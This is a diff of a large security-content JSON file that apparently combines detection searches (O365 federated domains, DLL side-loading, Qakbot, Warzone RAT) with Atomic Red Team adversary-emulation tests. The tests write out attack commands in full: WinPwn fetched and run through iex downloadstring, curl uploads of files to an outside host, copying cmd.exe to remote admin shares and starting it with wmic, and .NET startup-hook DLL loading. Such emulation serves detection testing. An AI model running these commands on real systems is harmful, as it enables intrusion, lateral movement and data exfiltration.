"T1136" @@ -616159,15 +622015,8 @@ ], "observable": [ { - "name": "ActorIpAddress", - "type": "IP Address", - "role": [ - "Attacker" - ] - }, - { - "name": "Target.ID", - "type": "Endpoint", + "name": "src_user", + "type": "User", "role": [ "Victim" ] @@ -616203,8 +622052,8 @@ }, { "name": "O365 New Federated Domain Added", - "description": "This search detects the addition of a new Federated domain.", - "search": "`o365_management_activity` Workload=Exchange Operation=\"Add-FederatedDomain\" | stats count min(_time) as firstTime max(_time) as lastTime values(Parameters{}.Value) as Parameters.Value by ObjectId Operation OrganizationName OriginatingServer UserId UserKey | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_new_federated_domain_added_filter`", + "description": "The following search detects the addition of a new Federated domain in O365 environments. If an attacker adds an unverified domain to Office 365, they may gain unauthorized access to the organization's email and other services, potentially leading to data breaches and information theft. It can be misused to set up adversary infrastruture for phishing, spoofing emails and malware distribution.", + "search": "`o365_management_activity` Operation IN (\"*add*\", \"*new*\") AND Operation=\"*domain*\" | stats count values(ModifiedProperties{}.NewValue) as new_value by user user_agent authentication_service action Workload Operation | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_new_federated_domain_added_filter`", "tags": { "name": "O365 New Federated Domain Added", "analytic_story": [ @@ -616218,7 +622067,7 @@ "kill_chain_phases": [ "Installation" ], - "message": "User $UserId$ has added a new federated domaain $Parameters.Value$ for $OrganizationName$", + "message": "User $user$ has added a new federated domain $new_value$", "mitre_attack_id": [ "T1136.003", "T1136" @@ -616228,14 +622077,7 @@ ], "observable": [ { - "name": "OrganizationName", - "type": "Other", - "role": [ - "Victim" - ] - }, - { - "name": "UserId", + "name": "user", "type": "User", "role": [ "Victim" @@ -617391,7 +623233,7 @@ "dependencies": [ { "description": "The Get-AzDomainInfo script must exist in PathToAtomicsFolder\\..\\ExternalPayloads.\n", - "prereq_command": "if (test-path PathToAtomicsFolder\\..\\ExternalPayloads\\Get-AzDomainInfo.ps1){exit 0} else {exit 1}\n", + "prereq_command": "if (test-path \"PathToAtomicsFolder\\..\\ExternalPayloads\\Get-AzDomainInfo.ps1\"){exit 0} else {exit 1}\n", "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\ninvoke-webrequest \"https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/Az/Get-AzDomainInfo.ps1\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\Get-AzDomainInfo.ps1\"\n" }, { @@ -618081,8 +623923,8 @@ "for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; [ $? -eq 0 ] && echo \"192.168.1.$ip UP\" || : ; done\n", "$localip = ((ipconfig | findstr [0-9].\\.)[0]).Split()[-1]\n$pieces = $localip.split(\".\")\n$firstOctet = $pieces[0]\n$secondOctet = $pieces[1]\n$thirdOctet = $pieces[2]\nforeach ($ip in 1..255 | % { \"$firstOctet.$secondOctet.$thirdOctet.$_\" } ) {cmd.exe /c nslookup $ip}\n", "adidnsdump -u domain\\user -p password --print-zones 192.168.1.1\n", - "PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe -f (objectcategory=computer)\n", - "PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe -sc dclist\n", + "\"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\" -f (objectcategory=computer)\n", + "\"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\" -sc dclist\n", "ip neighbour show\n", "ip route show\n", "ip tcp_metrics show |grep --invert-match \"^127\\.\"\n", @@ -618412,12 +624254,12 @@ "dependencies": [ { "description": "AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe)\n", - "prereq_command": "if (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe) -ErrorAction ignore | Out-Null\nInvoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe\" -OutFile PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\n" + "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\"\n" } ], "executor": { - "command": "PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe -f (objectcategory=computer)\n", + "command": "\"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\" -f (objectcategory=computer)\n", "name": "command_prompt" } }, @@ -618432,12 +624274,12 @@ "dependencies": [ { "description": "AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe)\n", - "prereq_command": "if (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe) -ErrorAction ignore | Out-Null\nInvoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe\" -OutFile PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\n" + "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\"\n" } ], "executor": { - "command": "PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe -sc dclist\n", + "command": "\"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\" -sc dclist\n", "name": "command_prompt" } }, @@ -621888,7 +627730,7 @@ "for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/192.168.1.1/$port) && echo port $port is open ; done\n", "sudo nmap -sS 192.168.1.0/24 -p 80\ntelnet 192.168.1.1 80\nnc -nv 192.168.1.1 80\n", "nmap 127.0.0.1", - "python \\T1046\\src\\T1046.py -i 127.0.0.1\n", + "python \"\\T1046\\src\\T1046.py\" -i 127.0.0.1\n", "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nspoolvulnscan -noninteractive -consoleoutput", "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nMS17-10 -noninteractive -consoleoutput", "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nbluekeep -noninteractive -consoleoutput", @@ -622050,7 +627892,7 @@ { "description": "NMap must be installed\n", "prereq_command": "if (cmd /c \"nmap 2>nul\") {exit 0} else {exit 1}", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest -OutFile PathToAtomicsFolder\\..\\ExternalPayloads\\nmap-7.80-setup.exe #{nmap_url}\nStart-Process PathToAtomicsFolder\\..\\ExternalPayloads\\nmap-7.80-setup.exe /S\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\nmap-7.80-setup.exe\" #{nmap_url}\nStart-Process \"PathToAtomicsFolder\\..\\ExternalPayloads\\nmap-7.80-setup.exe\" /S\n" } ], "executor": { @@ -622087,7 +627929,7 @@ } ], "executor": { - "command": "python #{filename} -i #{host_ip}\n", + "command": "python \"#{filename}\" -i #{host_ip}\n", "name": "powershell" } }, @@ -626498,8 +632340,8 @@ } ], "command_list": [ - "\\T1574.002\\bin\\GUP.exe\n", - "set DOTNET_STARTUP_HOOKS=\\T1574.002\\bin\\preloader.dll\ndotnet -h > nul\necho.\n" + "\"\\T1574.002\\bin\\GUP.exe\"\n", + "set DOTNET_STARTUP_HOOKS=\"\\T1574.002\\bin\\preloader.dll\"\ndotnet -h > nul\necho.\n" ], "commands": [], "queries": [], @@ -626534,12 +632376,12 @@ "dependencies": [ { "description": "Gup.exe binary must exist on disk at specified location (#{gup_executable})\n", - "prereq_command": "if (Test-Path #{gup_executable}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true\" -OutFile \"#{gup_executable}\"\n" + "prereq_command": "if (Test-Path \"#{gup_executable}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{gup_executable}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true\" -OutFile \"#{gup_executable}\"\n" } ], "executor": { - "command": "#{gup_executable}\n", + "command": "\"#{gup_executable}\"\n", "cleanup_command": "taskkill /F /IM #{process_name} >nul 2>&1\n", "name": "command_prompt" } @@ -626577,7 +632419,7 @@ } ], "executor": { - "command": "set DOTNET_STARTUP_HOOKS=#{preloader_dll}\ndotnet -h > nul\necho.\n", + "command": "set DOTNET_STARTUP_HOOKS=\"#{preloader_dll}\"\ndotnet -h > nul\necho.\n", "cleanup_command": "taskkill /F /IM #{process_name} >nul 2>&1\n", "name": "command_prompt" } @@ -627104,13 +632946,179 @@ } }, { - "name": "Windows DLL Side-Loading Process Child Of Calc", - "description": "The following analytic identifies the suspicious child process of calc.exe due to dll side loading technique to execute another executable. This technique was seen in qakbot malware that uses dll side loading technique to calc applications to load its malicious dll code. The malicious dll that abuses dll side loading technique will load the actual qakbot loader dll using regsvr32.exe application. This TTP is a good indicator of qakbot since the calc.exe will not load other child processes aside from win32calc.exe.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name = \"calc.exe\") AND Processes.process_name != \"win32calc.exe\" by Processes.parent_process Processes.process_name Processes.process_id Processes.process_guid Processes.process Processes.user Processes.dest | `drop_dm_object_name(\"Processes\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_dll_side_loading_process_child_of_calc_filter`", + "name": "Windows DLL Side-Loading Process Child Of Calc", + "description": "The following analytic identifies the suspicious child process of calc.exe due to dll side loading technique to execute another executable. This technique was seen in qakbot malware that uses dll side loading technique to calc applications to load its malicious dll code. The malicious dll that abuses dll side loading technique will load the actual qakbot loader dll using regsvr32.exe application. This TTP is a good indicator of qakbot since the calc.exe will not load other child processes aside from win32calc.exe.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name = \"calc.exe\") AND Processes.process_name != \"win32calc.exe\" by Processes.parent_process Processes.process_name Processes.process_id Processes.process_guid Processes.process Processes.user Processes.dest | `drop_dm_object_name(\"Processes\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_dll_side_loading_process_child_of_calc_filter`", + "tags": { + "name": "Windows DLL Side-Loading Process Child Of Calc", + "analytic_story": [ + "Qakbot" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation", + "Installation" + ], + "message": "calc.exe has a child process $process_name$ in $dest$", + "mitre_attack_id": [ + "T1574.002", + "T1574" + ], + "nist": [ + "DE.AE" + ], + "observable": [ + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + } + ], + "risk_score": 81, + "security_domain": "endpoint", + "risk_severity": "high", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1574.002", + "mitre_attack_technique": "DLL Side-Loading", + "mitre_attack_tactics": [ + "Defense Evasion", + "Persistence", + "Privilege Escalation" + ], + "mitre_attack_groups": [ + "APT19", + "APT3", + "APT32", + "APT41", + "BRONZE BUTLER", + "BlackTech", + "Chimera", + "Earth Lusca", + "GALLIUM", + "Higaisa", + "Lazarus Group", + "LuminousMoth", + "MuddyWater", + "Mustang Panda", + "Naikon", + "Patchwork", + "SideCopy", + "Sidewinder", + "Threat Group-3390", + "Tropic Trooper", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1574", + "mitre_attack_technique": "Hijack Execution Flow", + "mitre_attack_tactics": [ + "Defense Evasion", + "Persistence", + "Privilege Escalation" + ], + "mitre_attack_groups": [] + } + ] + } + }, + { + "name": "Windows Masquerading Explorer As Child Process", + "description": "The following analytic identifies a suspicious parent process of explorer.exe. Explorer is usually executed by userinit.exe that will exit after execution that causes the main explorer.exe no parent process. Some malware like qakbot spawn another explorer.exe to inject its code. This TTP detection is a good indicator that a process spawning explorer.exe might inject code or masquerading its parent child process to evade detections.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN(\"cmd.exe\", \"powershell.exe\", \"regsvr32.exe\") AND Processes.process_name = \"explorer.exe\" by Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process_id Processes.process_guid Processes.process Processes.user Processes.dest Processes.parent_process_id | `drop_dm_object_name(\"Processes\")` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `windows_masquerading_explorer_as_child_process_filter`", + "tags": { + "name": "Windows Masquerading Explorer As Child Process", + "analytic_story": [ + "Qakbot" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation", + "Installation" + ], + "message": "explorer.exe hash a suspicious parent process $parent_process_name$ in $dest$", + "mitre_attack_id": [ + "T1574.002", + "T1574" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + } + ], + "risk_score": 81, + "security_domain": "endpoint", + "risk_severity": "high", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1574.002", + "mitre_attack_technique": "DLL Side-Loading", + "mitre_attack_tactics": [ + "Defense Evasion", + "Persistence", + "Privilege Escalation" + ], + "mitre_attack_groups": [ + "APT19", + "APT3", + "APT32", + "APT41", + "BRONZE BUTLER", + "BlackTech", + "Chimera", + "Earth Lusca", + "GALLIUM", + "Higaisa", + "Lazarus Group", + "LuminousMoth", + "MuddyWater", + "Mustang Panda", + "Naikon", + "Patchwork", + "SideCopy", + "Sidewinder", + "Threat Group-3390", + "Tropic Trooper", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1574", + "mitre_attack_technique": "Hijack Execution Flow", + "mitre_attack_tactics": [ + "Defense Evasion", + "Persistence", + "Privilege Escalation" + ], + "mitre_attack_groups": [] + } + ] + } + }, + { + "name": "Windows Unsigned DLL Side-Loading", + "description": "This analysis focuses on detecting potentially malicious unsigned DLLs created in either the c:\\windows\\system32 or c:\\windows\\syswow64 folders. This particular technique was observed in the context of the Warzone (Ave Maria) RAT, where it employed a method known as DLL hijacking (dll-side-loading) by dropping the \"dismcore.dll\" to achieve privilege escalation. DLL hijacking is a stealthy attack technique used by cybercriminals to exploit the way Windows searches and loads DLLs. By placing a malicious DLL with the same name as one that a legitimate application is expected to load, the attacker can gain unauthorized access and execute malicious code. In the case of Warzone RAT (Ave Maria), the dropped \"dismcore.dll\" was intended to deceive the system into loading the rogue DLL instead of the legitimate version, thereby granting the malware elevated privileges and enabling further compromise of the target system. Detecting such suspicious DLLs is crucial in preventing privilege escalation attacks and other potential security breaches. Regular security assessments, thorough monitoring, and implementing security best practices are essential in safeguarding systems from such threats.", + "search": "`sysmon` EventCode=7 Signed=false OriginalFileName = \"-\" SignatureStatus=\"unavailable\" ImageLoaded IN (\"*:\\\\windows\\\\system32\\\\*\", \"*:\\\\windows\\\\syswow64\\\\*\") | stats count min(_time) as firstTime max(_time) as lastTime by Image ImageLoaded Signed SignatureStatus OriginalFileName process_name Computer EventCode ProcessId Hashes IMPHASH | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_unsigned_dll_side_loading_filter`", "tags": { - "name": "Windows DLL Side-Loading Process Child Of Calc", + "name": "Windows Unsigned DLL Side-Loading", "analytic_story": [ - "Qakbot" + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -627120,10 +633128,9 @@ "Exploitation", "Installation" ], - "message": "calc.exe has a child process $process_name$ in $dest$", + "message": "An unsigned dll module was loaded on $dest$", "mitre_attack_id": [ - "T1574.002", - "T1574" + "T1574.002" ], "nist": [ "DE.AE" @@ -627131,98 +633138,15 @@ "observable": [ { "name": "dest", - "type": "Hostname", - "role": [ - "Victim" - ] - } - ], - "risk_score": 81, - "security_domain": "endpoint", - "risk_severity": "high", - "mitre_attack_enrichments": [ - { - "mitre_attack_id": "T1574.002", - "mitre_attack_technique": "DLL Side-Loading", - "mitre_attack_tactics": [ - "Defense Evasion", - "Persistence", - "Privilege Escalation" - ], - "mitre_attack_groups": [ - "APT19", - "APT3", - "APT32", - "APT41", - "BRONZE BUTLER", - "BlackTech", - "Chimera", - "Earth Lusca", - "GALLIUM", - "Higaisa", - "Lazarus Group", - "LuminousMoth", - "MuddyWater", - "Mustang Panda", - "Naikon", - "Patchwork", - "SideCopy", - "Sidewinder", - "Threat Group-3390", - "Tropic Trooper", - "menuPass" - ] - }, - { - "mitre_attack_id": "T1574", - "mitre_attack_technique": "Hijack Execution Flow", - "mitre_attack_tactics": [ - "Defense Evasion", - "Persistence", - "Privilege Escalation" - ], - "mitre_attack_groups": [] - } - ] - } - }, - { - "name": "Windows Masquerading Explorer As Child Process", - "description": "The following analytic identifies a suspicious parent process of explorer.exe. Explorer is usually executed by userinit.exe that will exit after execution that causes the main explorer.exe no parent process. Some malware like qakbot spawn another explorer.exe to inject its code. This TTP detection is a good indicator that a process spawning explorer.exe might inject code or masquerading its parent child process to evade detections.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN(\"cmd.exe\", \"powershell.exe\", \"regsvr32.exe\") AND Processes.process_name = \"explorer.exe\" by Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process_id Processes.process_guid Processes.process Processes.user Processes.dest Processes.parent_process_id | `drop_dm_object_name(\"Processes\")` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `windows_masquerading_explorer_as_child_process_filter`", - "tags": { - "name": "Windows Masquerading Explorer As Child Process", - "analytic_story": [ - "Qakbot" - ], - "asset_type": "Endpoint", - "cis20": [ - "CIS 10" - ], - "kill_chain_phases": [ - "Exploitation", - "Installation" - ], - "message": "explorer.exe hash a suspicious parent process $parent_process_name$ in $dest$", - "mitre_attack_id": [ - "T1574.002", - "T1574" - ], - "nist": [ - "DE.CM" - ], - "observable": [ - { - "name": "dest", - "type": "Hostname", + "type": "Endpoint", "role": [ "Victim" ] } ], - "risk_score": 81, + "risk_score": 49, "security_domain": "endpoint", - "risk_severity": "high", + "risk_severity": "low", "mitre_attack_enrichments": [ { "mitre_attack_id": "T1574.002", @@ -627255,16 +633179,6 @@ "Tropic Trooper", "menuPass" ] - }, - { - "mitre_attack_id": "T1574", - "mitre_attack_technique": "Hijack Execution Flow", - "mitre_attack_tactics": [ - "Defense Evasion", - "Persistence", - "Privilege Escalation" - ], - "mitre_attack_groups": [] } ] } @@ -627407,13 +633321,13 @@ "$imewdbled = $env:SystemRoot + \"\\System32\\IME\\SHARED\\IMEWDBLD.exe\"\n& $imewdbled https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml\n", "C:\\Windows\\System32\\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\\users\\public\\music\\allthethingsx64.dll\nC:\\Windows\\System32\\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll --output c:\\users\\public\\music\\allthethingsx64.dll\nC:\\Windows\\System32\\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\\programdata\\allthethingsx64.dll\nC:\\Windows\\System32\\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o %Temp%\\allthethingsx64.dll\n", "C:\\Windows\\System32\\Curl.exe -T c:\\temp\\atomictestfile.txt www.example.com\nC:\\Windows\\System32\\Curl.exe --upload-file c:\\temp\\atomictestfile.txt www.example.com\nC:\\Windows\\System32\\Curl.exe -d c:\\temp\\atomictestfile.txt www.example.com\nC:\\Windows\\System32\\Curl.exe --data c:\\temp\\atomictestfile.txt www.example.com\n", - "\\T1105\\src\\T1105.bat 1>NUL \n", + "\"\\T1105\\src\\T1105.bat\" 1>NUL \n", "$machine_list = \"\\..\\ExternalPayloads\\T1105MachineList.txt\"\n$offline_list = \"\\..\\ExternalPayloads\\T1105OfflineHosts.txt\"\n$completed_list = \"\\..\\ExternalPayloads\\T1105CompletedHosts.txt\"\nforeach ($machine in get-content -path \"$machine_list\")\n{if (test-connection -Count 1 -computername $machine -quiet) \n{cmd /c copy \"$env:comspec\" \"\\\\$machine\\C$\\Windows\\Temp\\T1105.exe\"\necho $machine >> \"$completed_list\"\nwmic /node: \"$machine\" process call create \"regsvr32.exe /i C:\\Windows\\Temp\\T1105.exe\"}\nelse\n{echo $machine >> \"$offline_list\"}}\n", "del %TEMP%\\PrintBrm.zip >nul 2>&1 \nC:\\Windows\\System32\\spool\\tools\\PrintBrm.exe -b -d \\\\127.0.0.1\\c$\\AtomicRedTeam\\atomics\\T1105\\src\\ -f %TEMP%\\PrintBrm.zip -O FORCE\n", - "del %TEMP%\\redcanary.cab >nul 2>&1\nC:\\Windows\\System32\\replace.exe \\T1105\\src\\redcanary.cab %TEMP% /A\n", + "del %TEMP%\\redcanary.cab >nul 2>&1\nC:\\Windows\\System32\\replace.exe \"\\T1105\\src\\redcanary.cab\" %TEMP% /A\n", "del %TEMP%\\redcanary.cab >nul 2>&1\nC:\\Windows\\System32\\replace.exe \\\\127.0.0.1\\c$\\AtomicRedTeam\\atomics\\T1105\\src\\redcanary.cab %TEMP% /A\n", "certreq.exe -Post -config https://example.com c:\\windows\\win.ini %temp%\\Atomic-license.txt", - "wscript.exe \\T1105\\src\\T1105-download-file.vbs", + "wscript.exe \"\\T1105\\src\\T1105-download-file.vbs\"\n", "curl -sO https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh; chmod +x atomic.sh | bash atomic.sh\n", "cmd /c \"\\..\\ExternalPayloads\\nimgrab.exe\" https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt $env:TEMP\\Atomic-license.txt\n", "powershell.exe iwr -URI https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -Outfile %temp%\\Atomic-license.txt\n", @@ -628230,7 +634144,7 @@ { "description": "Curl must be installed on system.\n", "prereq_command": "if (Test-Path #{curl_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "Invoke-WebRequest \"https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip\" -Outfile PathToAtomicsFolder\\..\\ExternalPayloads\\curl.zip\nExpand-Archive -Path PathToAtomicsFolder\\..\\ExternalPayloads\\curl.zip -DestinationPath PathToAtomicsFolder\\..\\ExternalPayloads\\curl\nCopy-Item PathToAtomicsFolder\\..\\ExternalPayloads\\curl\\curl-7.79.1-win64-mingw\\bin\\curl.exe C:\\Windows\\System32\\Curl.exe\nRemove-Item PathToAtomicsFolder\\..\\ExternalPayloads\\curl\nRemove-Item PathToAtomicsFolder\\..\\ExternalPayloads\\curl.zip\n" + "get_prereq_command": "Invoke-WebRequest \"https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip\" -Outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\curl.zip\"\nExpand-Archive -Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\curl.zip\" -DestinationPath \"PathToAtomicsFolder\\..\\ExternalPayloads\\curl\"\nCopy-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\curl\\curl-7.79.1-win64-mingw\\bin\\curl.exe\" C:\\Windows\\System32\\Curl.exe\nRemove-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\curl\"\nRemove-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\curl.zip\"\n" } ], "executor": { @@ -628268,7 +634182,7 @@ { "description": "Curl must be installed on system.\n", "prereq_command": "if (Test-Path #{curl_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "Invoke-WebRequest \u201chttps://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip\u201d -Outfile PathToAtomicsFolder\\..\\ExternalPayloads\\curl.zip\nExpand-Archive -Path PathToAtomicsFolder\\..\\ExternalPayloads\\curl.zip -DestinationPath PathToAtomicsFolder\\..\\ExternalPayloads\\curl\nCopy-Item PathToAtomicsFolder\\..\\ExternalPayloads\\curl\\curl-7.79.1-win64-mingw\\bin\\curl.exe C:\\Windows\\System32\\Curl.exe\nRemove-Item PathToAtomicsFolder\\..\\ExternalPayloads\\curl\nRemove-Item PathToAtomicsFolder\\..\\ExternalPayloads\\curl.zip\n" + "get_prereq_command": "Invoke-WebRequest \"https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip\" -Outfile PathToAtomicsFolder\\..\\ExternalPayloads\\curl.zip\nExpand-Archive -Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\curl.zip\" -DestinationPath \"PathToAtomicsFolder\\..\\ExternalPayloads\\curl\"\nCopy-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\curl\\curl-7.79.1-win64-mingw\\bin\\curl.exe\" C:\\Windows\\System32\\Curl.exe\nRemove-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\curl\"\nRemove-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\curl.zip\"\n" }, { "description": "A file must be created to upload\n", @@ -628299,12 +634213,12 @@ "dependencies": [ { "description": "#{Path_to_file} must exist on system.\n", - "prereq_command": "if (Test-Path #{Path_to_file}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{Path_to_file}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.bat\" -OutFile \"#{Path_to_file}\"\n" + "prereq_command": "if (Test-Path \"#{Path_to_file}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{Path_to_file}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.bat\" -OutFile \"#{Path_to_file}\"\n" } ], "executor": { - "command": "#{Path_to_file} 1>NUL \n", + "command": "\"#{Path_to_file}\" 1>NUL \n", "cleanup_command": "del /f/s/q %temp%\\T1105 >nul 2>&1\nrmdir /s/q %temp%\\T1105 >nul 2>&1\n", "name": "command_prompt" } @@ -628400,12 +634314,12 @@ "dependencies": [ { "description": "#{replace_cab} must exist on system.\n", - "prereq_command": "if (Test-Path #{replace_cab}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{replace_cab}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/redcanary.cab\" -OutFile \"#{replace_cab}\"\n" + "prereq_command": "if (Test-Path \"#{replace_cab}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{replace_cab}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/redcanary.cab\" -OutFile \"#{replace_cab}\"\n" } ], "executor": { - "command": "del %TEMP%\\redcanary.cab >nul 2>&1\n#{Path_replace} #{replace_cab} %TEMP% /A\n", + "command": "del %TEMP%\\redcanary.cab >nul 2>&1\n#{Path_replace} \"#{replace_cab}\" %TEMP% /A\n", "cleanup_command": "del 